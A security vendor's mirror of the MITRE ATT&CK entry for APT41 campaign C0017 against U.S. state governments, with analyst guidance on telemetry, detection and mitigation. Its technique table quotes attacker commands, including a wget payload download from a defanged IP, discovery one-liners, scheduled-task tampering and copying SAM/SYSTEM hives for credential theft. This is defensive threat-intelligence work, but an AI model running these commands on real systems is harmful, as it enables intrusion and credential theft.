Live Active security incident? Get immediate response
MITRE ATT&CK® Campaign

C0017: C0017

C0017 was an APT41 campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During C0017, APT41 was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of C0017 are unknown, however APT41 was observed exfiltrating Personal Identifiable Information (PII).[1]

EnterpriseC0017CampaignObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

C0017 matters because it shows how a campaign can turn exposed web applications into repeated enterprise compromise, even after remediation. MITRE describes APT41 compromising at least six U.S. state government networks between May 2021 and February 2022 by exploiting vulnerable Internet-facing web applications, adapting to public and zero-day vulnerabilities, and exfiltrating PII. For leaders, the practical issue is not only patching; it is whether remediation is verified, credentials are assumed exposed, and monitoring can prove the attacker did not return.

Executive priority

Prioritize this as an Internet-facing application, identity, and data-protection risk. The supplied description highlights vulnerable public web apps, re-compromise after remediation, credential tooling such as Mimikatz, Active Directory discovery via dsquery, command-and-control, staging, and exfiltration behaviors. Executives should ask whether the organization can identify exposed applications quickly, patch or mitigate urgent vulnerabilities, validate eradication after compromise, preserve evidence for PII-related reporting, and demonstrate to auditors that remediation was effective rather than merely completed.

Technical view

SOC and IR teams should treat C0017 as a relationship-driven campaign profile: initial access through vulnerable public web applications, followed by discovery, credential access, execution, persistence, C2, staging, and exfiltration behaviors. ATT&CK provides no official detection text for the campaign, so validation should be built from the linked techniques and software: Mimikatz, dsquery, Cobalt Strike, KEYPLUG, DEADEYE, Ping, Windows command shell, JavaScript execution, scheduled tasks, masqueraded services/resources, protocol or service impersonation, web-protocol C2, proxy use, local data staging, and exfiltration over C2 or unencrypted non-C2 protocols.

Likely telemetry

  • Internet-facing web application, web server, reverse proxy, and WAF logs around exploitation attempts and suspicious post-exploitation requests
  • Vulnerability management and asset inventory records for externally reachable web applications, including remediation timestamps
  • Endpoint process, command-line, module/load, file creation, and service/task creation telemetry, especially on systems hosting public applications
  • Windows security and registry-related telemetry relevant to SAM access and credential dumping behaviors
  • Active Directory query and administrative tool usage telemetry, including dsquery where present

Detection direction

  • Because MITRE provides no campaign-level detection, map detections to the linked techniques and validate them against local telemetry availability.
  • Correlate public web application alerts with later endpoint execution, command shell activity, scheduled task creation, suspicious services, credential access, AD discovery, and outbound C2-like traffic.
  • Tune for living-off-the-land and dual-use ambiguity: Ping, dsquery, command shells, scheduled tasks, and Cobalt Strike-like activity can be legitimate in some contexts, so detections should include host role, user context, timing, parent process, and destination reputation where available.
  • Look specifically for remediation failure indicators: repeated suspicious activity from the same exposed application, new persistence after patching, or credential use after a host was rebuilt or cleaned.
  • Validate coverage for stealth and evasion relationships, including packed/obfuscated files, masqueraded task or service names, legitimate-looking file locations, and web traffic that blends with normal HTTP/S.

Mitigation priorities

  • Start with complete inventory and risk ranking of Internet-facing web applications; ensure urgent public vulnerabilities are patched, mitigated, or isolated based on exposure and business criticality.
  • After suspected exploitation, do not treat patching as eradication. Validate host integrity, remove persistence, rotate affected credentials, review AD exposure, and monitor for re-compromise.
  • Harden identity paths reachable from web application servers: restrict privileges, limit credential material on servers, monitor credential dumping indicators, and review service accounts used by exposed applications.
  • Reduce post-compromise movement and exfiltration options through network segmentation, least privilege, controlled egress, and monitoring of outbound web and unencrypted protocols.
  • Maintain evidence needed for incident response and compliance: vulnerability status, remediation actions, log retention, PII data location, access records, and exfiltration assessment artifacts.
Analyst notes and limits

The most important decision point is remediation assurance. The official description states that victims were re-compromised in at least two cases following remediation efforts, making this campaign especially relevant to IR closure criteria, executive reporting, and audit evidence. The relationship set also makes identity telemetry material: Mimikatz, SAM credential access, dsquery, and discovery behaviors suggest defenders should assume a web-app incident may become an enterprise credential and directory exposure problem.

ATT&CK does not provide official detection guidance, campaign platforms, or campaign tactics for C0017 in the supplied fields. Technique and software relationships provide defensive context, but they should not be treated as a complete kill chain for every intrusion. The campaign goals are stated as unknown, although PII exfiltration was observed. Local application inventory, vulnerability exposure, logging coverage, data locations, and incident evidence are required to determine relevance and priority.

Official MITRE ATT&CK definition

C0017

C0017 was an APT41 campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During C0017, APT41 was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of C0017 are unknown, however APT41 was observed exfiltrating Personal Identifiable Information (PII).[1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

29 rows
Domain ID Name Relationship / procedure
Enterprise T1680 Local Storage Discovery

During C0017, APT41 issued `ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems.CitationMandiant APT41
Enterprise T1027.002 Software Packing Sub-technique

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.CitationMandiant APT41
Enterprise T1033 System Owner/User Discovery

During C0017, APT41 used `whoami` to gather information from victim machines.CitationMandiant APT41
Enterprise T1036.004 Masquerade Task or Service Sub-technique

During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code.CitationMandiant APT41
Enterprise T1016 System Network Configuration Discovery

During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery.CitationMandiant APT41
Enterprise T1053.005 Scheduled Task Sub-technique

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.CitationMandiant APT41
Enterprise T1190 Exploit Public-Facing Application

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.CitationMandiant APT41
Enterprise T1505.003 Web Shell Sub-technique

During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.CitationMandiant APT41
Enterprise T1140 Deobfuscate/Decode Files or Information

During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.CitationMandiant APT41
Enterprise T1003.002 Security Account Manager Sub-technique

During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.CitationMandiant APT41
Enterprise T1027 Obfuscated Files or Information

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.CitationMandiant APT41
Enterprise T1041 Exfiltration Over C2 Channel

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.CitationMandiant APT41
Enterprise T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol Sub-technique

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.CitationMandiant APT41
Enterprise T1074.001 Local Data Staging Sub-technique

During C0017, APT41 copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.CitationMandiant APT41
Enterprise T1071.001 Web Protocols Sub-technique

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.CitationMandiant APT41
Enterprise T1005 Data from Local System

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.CitationMandiant APT41
Enterprise T1102.001 Dead Drop Resolver Sub-technique

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.CitationMandiant APT41
Enterprise T1059.007 JavaScript Sub-technique

During C0017, APT41 deployed JScript web shells on compromised systems.CitationMandiant APT41
Enterprise T1574 Hijack Execution Flow

During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.CitationMandiant APT41
Enterprise T1090 Proxy

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.CitationMandiant APT41
Enterprise T1036.005 Match Legitimate Resource Name or Location Sub-technique

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.CitationMandiant APT41
Enterprise T1059.003 Windows Command Shell Sub-technique

During C0017, APT41 used `cmd.exe` to execute reconnaissance commands.CitationMandiant APT41
Enterprise T1001.003 Protocol or Service Impersonation Sub-technique

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.CitationMandiant APT41
Enterprise T1134 Access Token Manipulation

During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation.CitationMandiant APT41
Enterprise T1567 Exfiltration Over Web Service

During C0017, APT41 used Cloudflare services for data exfiltration.CitationMandiant APT41
Enterprise T1560.003 Archive via Custom Method Sub-technique

During C0017, APT41 hex-encoded PII data prior to exfiltration.CitationMandiant APT41
Enterprise T1588.002 Tool Sub-technique

For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.CitationMandiant APT41
Enterprise T1105 Ingress Tool Transfer

During C0017, APT41 downloaded malicious payloads onto compromised systems.CitationMandiant APT41
Enterprise T1102 Web Service

During C0017, APT41 used the Cloudflare services for C2 communications.CitationMandiant APT41
Associated objects

Groups, software, and campaigns

Group Enterprise

G0096: APT41

APT41 is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, APT41 has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.[1] Notable behaviors include using a wide range of malware and tools to complete mission objectives. APT41 overlaps at least partially with public reporting on groups including BARIUM and Winnti Group.[2][3]

Malware Enterprise

S0154: Cobalt Strike

Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]

In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]

LinuxmacOSWindows
Malware Enterprise

S1051: KEYPLUG

KEYPLUG is a modular backdoor written in C++, with Windows and Linux variants, that has been used by APT41 since at least June 2021.[1]

LinuxWindows
Malware Enterprise

S1052: DEADEYE

DEADEYE is a malware launcher that has been used by APT41 since at least May 2021. DEADEYE has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).[1]

Windows
Tool Enterprise

S0105: dsquery

dsquery is a command-line utility that can be used to query Active Directory for information from a system within a domain. [1] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

Windows
Tool Enterprise

S0002: Mimikatz

Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [1] [2]

Windows
Tool Enterprise

S0097: Ping

Ping is an operating system utility commonly used to troubleshoot and verify network connections. [1]

Relationship explorer

All related ATT&CK context

uses · Technique T1680: Local Storage Discovery Enterprise uses · Technique T1027.002: Software Packing Enterprise uses · Technique T1033: System Owner/User Discovery Enterprise uses · Technique T1036.004: Masquerade Task or Service Enterprise uses · Technique T1016: System Network Configuration Discovery Enterprise uses · Technique T1053.005: Scheduled Task Enterprise uses · Technique T1190: Exploit Public-Facing Application Enterprise uses · Technique T1505.003: Web Shell Enterprise uses · Technique T1140: Deobfuscate/Decode Files or Information Enterprise uses · Technique T1003.002: Security Account Manager Enterprise uses · Malware S0154: Cobalt Strike Enterprise uses · Malware S1051: KEYPLUG Enterprise uses · Technique T1027: Obfuscated Files or Information Enterprise uses · Malware S1052: DEADEYE Enterprise uses · Technique T1041: Exfiltration Over C2 Channel Enterprise uses · Technique T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol Enterprise uses · Technique T1074.001: Local Data Staging Enterprise uses · Tool S0105: dsquery Enterprise uses · Technique T1071.001: Web Protocols Enterprise uses · Technique T1005: Data from Local System Enterprise uses · Technique T1102.001: Dead Drop Resolver Enterprise uses · Technique T1059.007: JavaScript Enterprise uses · Tool S0002: Mimikatz Enterprise uses · Technique T1574: Hijack Execution Flow Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
71597dfcce1c7ab3...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 71597dfcce1c…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    Mandiant APT41

    Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.

    Open source URL
  2. [2]
    mitre-attack C0017
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use